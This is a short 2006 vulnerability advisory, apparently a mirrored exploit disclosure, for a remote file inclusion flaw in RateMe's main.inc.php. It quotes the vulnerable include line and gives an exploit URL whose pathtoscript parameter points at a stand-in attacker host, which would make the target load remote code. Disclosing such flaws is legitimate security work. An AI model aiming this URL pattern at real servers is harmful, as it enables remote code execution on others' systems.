Lucene search
SecurityvulnsSECURITYVULNS:DOC:15419HistoryDec 18, 2006 - 12:00 a.m.
RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability
2006-12-1800:00:00
vulners.com
20
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
;;ii,,:: + -
:::: :: ;;tt;;:: + -
;;:: ...,,:: ;;ii,,:: -
,,,, ii;;,, ii;;:: ;;ii,,:: + -
ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + -
ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: + -
tt;;::..,, tt;;,, ff;;;;ii ;;ii,,:: + -
tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,:: + -
tt;;;;,, tt;;,,.. tt;;;; ;;ii;;:: + -
..::,,;;,, tt;;,,.. tt;;,, ;;ii,,:: + -
..::,,ii;;;;.. tt;;,,.. iiii,,:: ;;ii,,:: + -
::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,:: + -
,,;;ii tt;;,, ii;;,,.. ...jj;;:: ;;ii;;:: -
;;;;:: tt;;:: tt;;;;.. ff;;:: ;;tt,,.. + -
ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,.. + -
,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;.. + -
tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,.. + -
jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,.. + -
;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;.. + -
..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,.. + -
iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;; + -
..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;:: ;;ii,, + -
jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,, + -
jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii:: + -
iijjjjjjtt;; ;;ffffjjjjtt:: ;;ii + -
;;.. ii;; + -
.. +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#########################################################################################################
Affected Script: RateMe
Exploit name : RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability
Author: Al7ejaz Hacker
Website: http://www.planetluc.com/en/ not free version
Discovered: 15/12/2006
Conatact : saudi[at]hotmail.fr - - al7ejaz.hackerz[at]gmail.com
#########################################################################################################
#########################################################################################################
Description :
File infected : main.inc.php , line 17
echo "\n<!-- Start RateMe v$version output –>\n\n<link href='".$pathtoscript."style.css'
rel='stylesheet' type='text/css'>\n<div class='votingtxt'>";
include($pathtoscript.'db_connect.inc.php'); # <==
Exploit : http://victime/path/main.inc.php?pathtoscript=http://Atacke
########################################################################################################